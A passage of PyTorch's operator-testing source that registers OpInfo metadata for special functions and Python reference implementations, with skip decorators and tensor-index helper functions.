dtypes=all_types_and(torch.bool), ref=scipy.special.j1 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.bessel_y0', decorators=( precisionOverride( { torch.float32: 1e-04, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.y0 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.bessel_y1', decorators=( precisionOverride( { torch.float32: 1e-04, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.y1 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), BinaryUfuncInfo( 'special.chebyshev_polynomial_t', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.chebyshev_polynomial_u', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.chebyshev_polynomial_v', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.chebyshev_polynomial_w', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.hermite_polynomial_h', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.hermite_polynomial_he', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.laguerre_polynomial_l', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.legendre_polynomial_p', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), UnaryUfuncInfo( 'special.modified_bessel_i0', decorators=( precisionOverride( { torch.float32: 1e-03, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.i0 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.modified_bessel_i1', decorators=( precisionOverride( { torch.float32: 1e-03, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.i1 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.modified_bessel_k0', decorators=( precisionOverride( { torch.float32: 1e-03, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.k0 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.modified_bessel_k1', decorators=( precisionOverride( { torch.float32: 1e-03, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.k1 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), BinaryUfuncInfo( 'special.shifted_chebyshev_polynomial_t', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.shifted_chebyshev_polynomial_u', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.shifted_chebyshev_polynomial_v', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.shifted_chebyshev_polynomial_w', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), ] # NOTE [Python References] # Python References emulate existing PyTorch operations, but can ultimately # be expressed in terms of "primitive" operations from torch._prims. # # These references are experimental. # See https://dev-discuss.pytorch.org/t/tracing-with-primitives-update-0/577 # for additional context. # # Python Reference OpInfos should be added to the python_ref_db list below. # Tests can opt-into running on these references by including # that list in the Sequence they pass to the @ops decorator. # # When a Python Reference OpInfo is constructed a pointer to an # existing OpInfo must be provided using the torch_opinfo_name kwarg. # The existing OpInfo with that name and no variant will be found # to inherit from. # # Instead of just inheriting the existing OpInfo's metadata, the # Python Reference OpInfos inherit the existing OpInfo's # construction arguments. These arguments can be overridden # by adding kwargs to the constructor. def _find_referenced_opinfo(referenced_name): ''' Finds the OpInfo with the given name that has no variant name. ''' for opinfo in op_db: if opinfo.name == referenced_name and opinfo.variant_test_name == '': return opinfo def _inherit_constructor_args(name, op, inherited, overrides): # inherits metadata common_kwargs = { 'name': name, 'op': op, 'aliases': None, # TODO add a check for alias coverage 'method_variant': None, 'inplace_variant': None, # TODO: add a check for inplace coverage 'supports_scripting': False, } # Acquires inherited kwargs kwargs = inherited.copy() # Fixes metadata if 'kwargs' in kwargs: kwargs.update(kwargs['kwargs']) del kwargs['kwargs'] if 'self' in kwargs: del kwargs['self'] if '__class__' in kwargs: del kwargs['__class__'] if 'skips' in kwargs: del kwargs['skips'] if 'decorators' in kwargs: del kwargs['decorators'] # Overrides metadata kwargs.update(common_kwargs) kwargs.update(overrides) kwargs['supports_autograd'] = False kwargs['supports_gradgrad'] = False kwargs['supports_fwgrad_bwgrad'] = False kwargs['supports_inplace_autograd'] = False kwargs['supports_forward_ad'] = False return kwargs class PythonRefInfo(OpInfo): ''' An OpInfo for a Python reference of an OpInfo base class operation. ''' def __init__( self, name, # the stringname of the callable Python reference *, op=None, # the function variant of the operation, populated as torch.<name> if None torch_opinfo_name, # the string name of the corresponding torch opinfo validate_view_consistency=True, **kwargs): # additional kwargs override kwargs inherited from the torch opinfo self.torch_opinfo_name = torch_opinfo_name self.torch_opinfo = _find_referenced_opinfo(torch_opinfo_name) self.validate_view_consistency = validate_view_consistency assert isinstance(self.torch_opinfo, OpInfo) inherited = self.torch_opinfo._original_opinfo_args ukwargs = _inherit_constructor_args(name, op, inherited, kwargs) super(PythonRefInfo, self).__init__(**ukwargs) class ReductionPythonRefInfo(ReductionOpInfo): ''' An OpInfo for a Python reference of an elementwise unary operation. ''' def __init__( self, name, # the stringname of the callable Python reference *, op=None, # the function variant of the operation, populated as torch.<name> if None torch_opinfo_name, # the string name of the corresponding torch opinfo **kwargs): # additional kwargs override kwargs inherited from the torch opinfo self.torch_opinfo_name = torch_opinfo_name self.torch_opinfo = _find_referenced_opinfo(torch_opinfo_name) assert isinstance(self.torch_opinfo, ReductionOpInfo) inherited = self.torch_opinfo._original_reduction_args ukwargs = _inherit_constructor_args(name, op, inherited, kwargs) # See https://github.com/pytorch/pytorch/issues/77216 self.validate_view_consistency = False super().__init__(**ukwargs) class ElementwiseUnaryPythonRefInfo(UnaryUfuncInfo): ''' An OpInfo for a Python reference of an elementwise unary operation. ''' def __init__( self, name, # the stringname of the callable Python reference *, op=None, # the function variant of the operation, populated as torch.<name> if None torch_opinfo_name, # the string name of the corresponding torch opinfo **kwargs): # additional kwargs override kwargs inherited from the torch opinfo self.torch_opinfo_name = torch_opinfo_name self.torch_opinfo = _find_referenced_opinfo(torch_opinfo_name) assert isinstance(self.torch_opinfo, UnaryUfuncInfo) inherited = self.torch_opinfo._original_unary_ufunc_args ukwargs = _inherit_constructor_args(name, op, inherited, kwargs) super(ElementwiseUnaryPythonRefInfo, self).__init__(**ukwargs) class ElementwiseBinaryPythonRefInfo(BinaryUfuncInfo): ''' An OpInfo for a Python reference of an elementwise binary operation. ''' def __init__( self, name, # the stringname of the callable Python reference *, op=None, # the function variant of the operation, populated as torch.<name> if None torch_opinfo_name, # the string name of the corresponding torch opinfo **kwargs): # additional kwargs override kwargs inherited from the torch opinfo self.torch_opinfo_name = torch_opinfo_name self.torch_opinfo = _find_referenced_opinfo(torch_opinfo_name) assert isinstance(self.torch_opinfo, BinaryUfuncInfo) inherited = self.torch_opinfo._original_binary_ufunc_args ukwargs = _inherit_constructor_args(name, op, inherited, kwargs) super(ElementwiseBinaryPythonRefInfo, self).__init__(**ukwargs) # Separate registry for experimental Python Reference OpInfos. python_ref_db = [ # # Elementwise Unary OpInfos # ElementwiseUnaryPythonRefInfo( "_refs.abs", torch_opinfo_name="abs", ), ElementwiseUnaryPythonRefInfo( "_refs.acos", torch_opinfo_name="acos", ), ElementwiseUnaryPythonRefInfo( "_refs.acosh", torch_opinfo_name="acosh", ), ElementwiseUnaryPythonRefInfo( "_refs.asin", torch_opinfo_name="asin", ), ElementwiseUnaryPythonRefInfo( "_refs.atan", torch_opinfo_name="atan", ), ElementwiseUnaryPythonRefInfo( "_refs.bitwise_not", torch_opinfo_name="bitwise_not", ), ElementwiseUnaryPythonRefInfo( "_refs.ceil", torch_opinfo_name="ceil", ), ElementwiseUnaryPythonRefInfo( "_refs.cos", torch_opinfo_name="cos", ), ElementwiseUnaryPythonRefInfo( "_refs.cosh", torch_opinfo_name="cosh", ), ElementwiseUnaryPythonRefInfo( "_refs.digamma", torch_opinfo_name="digamma", ), ElementwiseUnaryPythonRefInfo( "_refs.erf", torch_opinfo_name="erf", ), ElementwiseUnaryPythonRefInfo( "_refs.erfinv", torch_opinfo_name="erfinv", ), ElementwiseUnaryPythonRefInfo( "_refs.erfc", torch_opinfo_name="erfc", ), ElementwiseUnaryPythonRefInfo( "_refs.exp", torch_opinfo_name="exp", ), ElementwiseUnaryPythonRefInfo( "_refs.expm1", torch_opinfo_name="expm1", ), ElementwiseUnaryPythonRefInfo( "_refs.exp2", torch_opinfo_name="exp2", ), ElementwiseUnaryPythonRefInfo( "_refs.fill", torch_opinfo_name="fill", supports_out=True, ), ElementwiseUnaryPythonRefInfo( "_refs.floor", torch_opinfo_name="floor", ), ElementwiseUnaryPythonRefInfo( "_refs.frac", torch_opinfo_name="frac", ), ElementwiseUnaryPythonRefInfo( "_refs.isfinite", torch_opinfo_name="isfinite", supports_out=True, ), ElementwiseUnaryPythonRefInfo( "_refs.isinf", torch_opinfo_name="isinf", supports_out=True, ), ElementwiseUnaryPythonRefInfo( "_refs.isnan", torch_opinfo_name="isnan", supports_out=True, ), ElementwiseUnaryPythonRefInfo( "_refs.i0", torch_opinfo_name="i0", ), ElementwiseUnaryPythonRefInfo( "_refs.lgamma", torch_opinfo_name="lgamma", ), ElementwiseUnaryPythonRefInfo( "_refs.log", torch_opinfo_name="log", ), ElementwiseUnaryPythonRefInfo( "_refs.log1p", torch_opinfo_name="log1p", ), ElementwiseUnaryPythonRefInfo( "_refs.log10", torch_opinfo_name="log10", ), ElementwiseUnaryPythonRefInfo( "_refs.log2", torch_opinfo_name="log2", ), ElementwiseUnaryPythonRefInfo( "_refs.nan_to_num", torch_opinfo_name="nan_to_num", ), ElementwiseUnaryPythonRefInfo( "_refs.neg", torch_opinfo_name="neg", ), ElementwiseUnaryPythonRefInfo( "_refs.positive", torch_opinfo_name="positive", ), ElementwiseUnaryPythonRefInfo( "_refs.reciprocal", torch_opinfo_name="reciprocal", ), ElementwiseUnaryPythonRefInfo( "_refs.round", torch_opinfo_name="round", ), ElementwiseUnaryPythonRefInfo( "_refs.sigmoid", torch_opinfo_name="sigmoid", # Reference: https://github.com/pytorch/pytorch/issues/56012 handles_complex_extremal_values=False, handles_large_floats=False, ), ElementwiseUnaryPythonRefInfo( "_refs.sign", torch_opinfo_name="sign", ), ElementwiseUnaryPythonRefInfo( "_refs.signbit", torch_opinfo_name="signbit", ), ElementwiseUnaryPythonRefInfo( "_refs.sin", torch_opinfo_name="sin", ), ElementwiseUnaryPythonRefInfo( "_refs.sinh", torch_opinfo_name="sinh", ), ElementwiseUnaryPythonRefInfo( "_refs.sqrt", torch_opinfo_name="sqrt", ), ElementwiseUnaryPythonRefInfo( "_refs.square", torch_opinfo_name="square", ), ElementwiseUnaryPythonRefInfo( "_refs.tan", torch_opinfo_name="tan", ), ElementwiseUnaryPythonRefInfo( "_refs.tanh", torch_opinfo_name="tanh", ), # # Elementwise Unary Special OpInfos # ElementwiseUnaryPythonRefInfo( "_refs.special.i0e", torch_opinfo_name="special.i0e", ), ElementwiseUnaryPythonRefInfo( "_refs.special.i1", torch_opinfo_name="special.i1", ), ElementwiseUnaryPythonRefInfo( "_refs.special.i1e", torch_opinfo_name="special.i1e", ), ElementwiseUnaryPythonRefInfo( "_refs.special.logit", torch_opinfo_name="logit", ), # # Elementwise Unary nn.functional OpInfos # ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.celu", torch_opinfo_name="nn.functional.celu", ), PythonRefInfo( "_refs.nn.functional.dropout", torch_opinfo_name="nn.functional.dropout", decorators=( DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestCommon', 'test_python_ref'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestCommon', 'test_python_ref_torch_fallback'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestCommon', 'test_out_warning'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestMathBits', 'test_neg_conj_view'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestMathBits', 'test_neg_view'), ) ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.elu", torch_opinfo_name="nn.functional.elu", ), PythonRefInfo( "_refs.nn.functional.leaky_relu", torch_opinfo_name="nn.functional.leaky_relu", ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.relu", torch_opinfo_name="nn.functional.relu", decorators=( # Need FakeTensor support for meta coverage DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_meta',), ), ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.mish", torch_opinfo_name="nn.functional.mish", ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.selu", torch_opinfo_name="nn.functional.selu", ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.softplus", torch_opinfo_name="nn.functional.softplus", ), PythonRefInfo( "_refs.nn.functional.margin_ranking_loss", torch_opinfo_name="nn.functional.margin_ranking_loss", ), PythonRefInfo( "_refs.nn.functional.hinge_embedding_loss", torch_opinfo_name="nn.functional.hinge_embedding_loss", ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.tanhshrink", torch_opinfo_name="nn.functional.tanhshrink", ), # # Elementwise Binary Reference OpInfos # ElementwiseBinaryPythonRefInfo( "_refs.add", torch_opinfo_name="add", # https://github.com/pytorch/pytorch/issues/76944 supports_two_python_scalars=False, supports_one_python_scalar=True, ), ElementwiseBinaryPythonRefInfo( "_refs.atan2", torch_opinfo_name="atan2", ), ElementwiseBinaryPythonRefInfo( "_refs.bitwise_and", torch_opinfo_name="bitwise_and", ), ElementwiseBinaryPythonRefInfo( "_refs.bitwise_left_shift", torch_opinfo_name="bitwise_left_shift", ), ElementwiseBinaryPythonRefInfo( "_refs.bitwise_or", torch_opinfo_name="bitwise_or", ), ElementwiseBinaryPythonRefInfo( "_refs.bitwise_xor", torch_opinfo_name="bitwise_xor", ), ElementwiseBinaryPythonRefInfo( "_refs.eq", torch_opinfo_name="eq", ), ElementwiseBinaryPythonRefInfo( "_refs.float_power", torch_opinfo_name="float_power", skips=( # Test doesn't account for float -> double type promotion DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'), ) ), ElementwiseBinaryPythonRefInfo( "_refs.fmax", torch_opinfo_name="fmax", supports_rhs_python_scalar=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_errors'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.fmin", torch_opinfo_name="fmin", supports_rhs_python_scalar=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_errors'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.fmod", torch_opinfo_name="fmod", rhs_make_tensor_kwargs={'exclude_zero': True}, skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_errors'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_python_ref', dtypes=(torch.bfloat16,), device_type='cpu'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_python_ref_torch_fallback', dtypes=(torch.bfloat16,), device_type='cpu'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.ge", torch_opinfo_name="ge", ), ElementwiseBinaryPythonRefInfo( "_refs.gt", torch_opinfo_name="gt", ), ElementwiseBinaryPythonRefInfo( "_refs.igamma", torch_opinfo_name="igamma", ), ElementwiseBinaryPythonRefInfo( "_refs.igammac", torch_opinfo_name="igammac", ), ElementwiseBinaryPythonRefInfo( "_refs.isclose", torch_opinfo_name="isclose", skips=( # Intentional xfail -- isclose does not type promote DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.le", torch_opinfo_name="le", ), ElementwiseBinaryPythonRefInfo( "_refs.logical_and", torch_opinfo_name="logical_and", ), ElementwiseBinaryPythonRefInfo( "_refs.logical_or", torch_opinfo_name="logical_or", ), ElementwiseBinaryPythonRefInfo( "_refs.logical_xor", torch_opinfo_name="logical_xor", ), ElementwiseBinaryPythonRefInfo( "_refs.lt", torch_opinfo_name="lt", ), ElementwiseBinaryPythonRefInfo( "_refs.maximum", torch_opinfo_name="maximum", skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_errors'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.minimum", torch_opinfo_name="minimum", skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_errors'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.mul", torch_opinfo_name="mul", # https://github.com/pytorch/pytorch/issues/76944 supports_two_python_scalars=False, supports_one_python_scalar=True, ), ElementwiseBinaryPythonRefInfo( "_refs.ne", torch_opinfo_name="ne", ), ElementwiseBinaryPythonRefInfo( "_refs.nextafter", torch_opinfo_name="nextafter", ), ElementwiseBinaryPythonRefInfo( "_refs.pow", torch_opinfo_name="pow", ), ElementwiseBinaryPythonRefInfo( "_refs.sub", torch_opinfo_name="sub", # https://github.com/pytorch/pytorch/issues/76944 supports_two_python_scalars=False, supports_one_python_scalar=True, ), ElementwiseBinaryPythonRefInfo( "_refs.true_divide", torch_opinfo_name="true_divide", # https://github.com/pytorch/pytorch/issues/76944 supports_two_python_scalars=False, supports_one_python_scalar=True, ), # # Elementwise Binary Special OpInfos # ElementwiseBinaryPythonRefInfo( "_refs.special.zeta", torch_opinfo_name="special.zeta", supports_one_python_scalar=True, ), # # Elementwise Ternary Reference OpInfos # PythonRefInfo( "_refs.clamp", torch_opinfo_name="clamp", ), # # Data Conversion & Data Movement Opinfos # PythonRefInfo( "_refs.clone", torch_opinfo_name="clone", ), # # View & Shape OpInfos # PythonRefInfo( "_refs.atleast_1d", torch_opinfo_name="atleast_1d", ), PythonRefInfo( "_refs.atleast_2d", torch_opinfo_name="atleast_2d", ), PythonRefInfo( "_refs.atleast_3d", torch_opinfo_name="atleast_3d", ), PythonRefInfo( "_refs.as_strided", torch_opinfo_name="as_strided", # FIXME: doesn't support chalf dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), skips=( # TODO: fix and/or update to xfails DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestCommon', 'test_python_ref_meta'), # cloned_mutable_input.is_same(returned_output) INTERNAL ASSERT FAILED DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestMathBits', 'test_neg_conj_view'), ), ), PythonRefInfo( "_refs.broadcast_shapes", torch_opinfo_name="broadcast_shapes", ), PythonRefInfo( "_refs.broadcast_tensors", torch_opinfo_name="broadcast_tensors", ), PythonRefInfo( "_refs.broadcast_to", torch_opinfo_name="broadcast_to", ), PythonRefInfo( "_refs.cat", torch_opinfo_name="cat", ), PythonRefInfo( "_refs.chunk", torch_opinfo_name="chunk", ), PythonRefInfo( "_refs.column_stack", torch_opinfo_name="column_stack", ), PythonRefInfo( "_refs.dsplit", torch_opinfo_name="dsplit", ), PythonRefInfo( "_refs.dstack", torch_opinfo_name="dstack", ), PythonRefInfo( "_refs.flatten", torch_opinfo_name="flatten", ), PythonRefInfo( "_refs.flip", torch_opinfo_name="flip", ), PythonRefInfo( "_refs.fliplr", torch_opinfo_name="fliplr", ), PythonRefInfo( "_refs.flipud", torch_opinfo_name="flipud", ), PythonRefInfo( "_refs.narrow", torch_opinfo_name="narrow", ), PythonRefInfo( "_refs.permute", torch_opinfo_name="permute", ), PythonRefInfo( "_refs.reshape", torch_opinfo_name="reshape", ), PythonRefInfo( "_refs.roll", torch_opinfo_name="roll", validate_view_consistency=False, ), PythonRefInfo( "_refs.rot90", torch_opinfo_name="rot90", validate_view_consistency=False, ), PythonRefInfo( "_refs.stack", torch_opinfo_name="stack", ), PythonRefInfo( "_refs.squeeze", torch_opinfo_name="squeeze", ), PythonRefInfo( "_refs.tensor_split", torch_opinfo_name="tensor_split", skips=( # TensorMeta doesn't support tolist DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_meta'), # RuntimeError: no _refs support for torch.Tensor.tolist DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref'), ) ), PythonRefInfo( "_refs.transpose", torch_opinfo_name="transpose", ), PythonRefInfo( "_refs.t", torch_opinfo_name="t", ), PythonRefInfo( "_refs.unsqueeze", torch_opinfo_name="unsqueeze", ), PythonRefInfo( "_refs.view", torch_opinfo_name="view", ), # # Reduction Reference OpInfos # ReductionPythonRefInfo( "_refs.all", torch_opinfo_name="all", ), ReductionPythonRefInfo( "_refs.amax", torch_opinfo_name="amax", ), ReductionPythonRefInfo( "_refs.amin", torch_opinfo_name="amin", ), ReductionPythonRefInfo( "_refs.any", torch_opinfo_name="any", ), ReductionPythonRefInfo( "_refs.mean", torch_opinfo_name="mean", supports_out=True, ), ReductionPythonRefInfo( "_refs.std", torch_opinfo_name="std", supports_out=True ), # std_mean and var_mean are not ReductionInfos PythonRefInfo( "_refs.std_mean", torch_opinfo_name="std_mean", validate_view_consistency=False ), ReductionPythonRefInfo( "_refs.sum", torch_opinfo_name="sum", supports_out=True, ), ReductionPythonRefInfo( "_refs.prod", torch_opinfo_name="prod", supports_out=True, ), ReductionPythonRefInfo( "_refs.var", torch_opinfo_name="var", supports_out=True ), PythonRefInfo( "_refs.var_mean", torch_opinfo_name="var_mean", validate_view_consistency=False ), # # Linear Algebra Operators # PythonRefInfo( "_refs.addr", torch_opinfo_name="addr", decorators=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref',), ), ), # # Tensor Creation Reference OpInfos # PythonRefInfo( "_refs.empty", torch_opinfo_name="empty", skips=( DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_python_ref'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_python_ref_torch_fallback'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out_warning'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_neg_conj_view'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_neg_view'), ), ), PythonRefInfo( "_refs.empty_like", torch_opinfo_name="empty_like", skips=( DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_python_ref'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_python_ref_torch_fallback'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out_warning'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_neg_conj_view'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_neg_view'), ), ), # # Conditional Reference OpInfos # PythonRefInfo( "_refs.where", torch_opinfo_name="where", op=lambda self, condition, other: refs.where(condition, self, other), ), ] # Common operator groupings ops_and_refs = op_db + python_ref_db unary_ufuncs = [op for op in op_db if isinstance(op, UnaryUfuncInfo)] binary_ufuncs = [op for op in op_db if isinstance(op, BinaryUfuncInfo)] binary_ufuncs_and_refs = tuple(op for op in ops_and_refs if isinstance(op, BinaryUfuncInfo)) spectral_funcs = [op for op in op_db if isinstance(op, SpectralFuncInfo)] sparse_unary_ufuncs = [op for op in op_db if isinstance(op, UnaryUfuncInfo) and op.supports_sparse] sparse_csr_unary_ufuncs = [op for op in op_db if isinstance(op, UnaryUfuncInfo) and op.supports_sparse_csr] sparse_reduction_ops = [op for op in op_db if isinstance(op, ReductionOpInfo) and op.supports_sparse] shape_funcs = [op for op in op_db if isinstance(op, ShapeFuncInfo)] reduction_ops = [op for op in op_db if isinstance(op, ReductionOpInfo)] reference_filtered_ops = [op for op in reduction_ops if op.ref not in (_NOTHING, None)] reference_masked_ops = [op for op in reference_filtered_ops if op.name.startswith('_masked.')] sparse_masked_reduction_ops = [op for op in sparse_reduction_ops if op.name.startswith('_masked.')] # TODO: review porting these to make_tensor def index_variable(shape, max_indices, device=torch.device('cpu')): if not isinstance(shape, tuple): shape = (shape,) index = torch.rand(*shape, dtype=torch.double, device=device).mul_(max_indices).floor_().long() return index def gather_variable(shape, index_dim, max_indices, duplicate=False, device=torch.device('cpu')): assert len(shape) == 2 assert index_dim < 2 batch_dim = 1 - index_dim index = torch.zeros(*shape, dtype=torch.long, device=device) for i in range(shape[index_dim]): index.select(index_dim, i).copy_( torch.randperm(max_indices, device=device)[:shape[batch_dim]]) if duplicate: index.select(batch_dim, 0).copy_(index.select(batch_dim, 1)) return index def bernoulli_scalar(): return torch.tensor(0, dtype=torch.bool).bernoulli_() def mask_not_all_zeros(shape): assert len(shape) > 0 while True: result = torch.randn(shape).gt(0) if result.sum() > 0: return result # TODO: move all tri/tril/triu testing to tensor creation op test suite and remove # these from here def _compare_trilu_indices( self, row, col, offset=0, dtype=torch.long, device='cpu'): if row == 0 or col == 0: # have to handle this separately as tril and triu does not take # empty matrix as input self.assertEqual( torch.empty(0, 2, dtype=dtype, device=device).transpose(0, 1), torch.tril_indices(row, col, offset, dtype=dtype, device=device)) self.assertEqual( torch.empty(0, 2, dtype=dtype, device=device).transpose(0, 1), torch.triu_indices(row, col, offset, dtype=dtype, device=device)) else: # TODO(#38095): Replace assertEqualIgnoreType. See issue #38095 self.assertEqualIgnoreType( torch.ones(row, col, device='cpu') .tril(offset).nonzero().to(dtype).transpose(0, 1), torch.tril_indices(row, col, offset, dtype=dtype, device=device)) # TODO(#38095): Replace assertEqualIgnoreType. See issue #38095 self.assertEqualIgnoreType( torch.ones(row, col, device='cpu') .triu(offset).nonzero().to(dtype).transpose(0, 1), torch.triu_indices(row, col, offset, dtype=dtype, device=device)) def _compare_large_trilu_indices( self, row, col, offset=0, dtype=torch.long, device='cpu'): l = torch.ones(row, col, dtype=dtype, device='cpu').tril(offset) \ .nonzero()[-100:-1, :].transpose(0, 1).to(device) torch.cuda.empty_cache() r = torch.tril_indices( row, col, offset, dtype=dtype, device=device)[:, -100:-1] self.assertEqual(l, r) torch.cuda.empty_cache() l = torch.ones(row, col, dtype=dtype, device='cpu').triu(offset) \ .nonzero()[-100:-1, :].transpose(0, 1).to(device) torch.cuda.empty_cache() r = torch.triu_indices( row, col, offset, dtype=dtype, device=device)[:, -100:-1] self.assertEqual(l, r) torch.cuda.empty_cache() # ( # row # col # offset (optional) # dtype 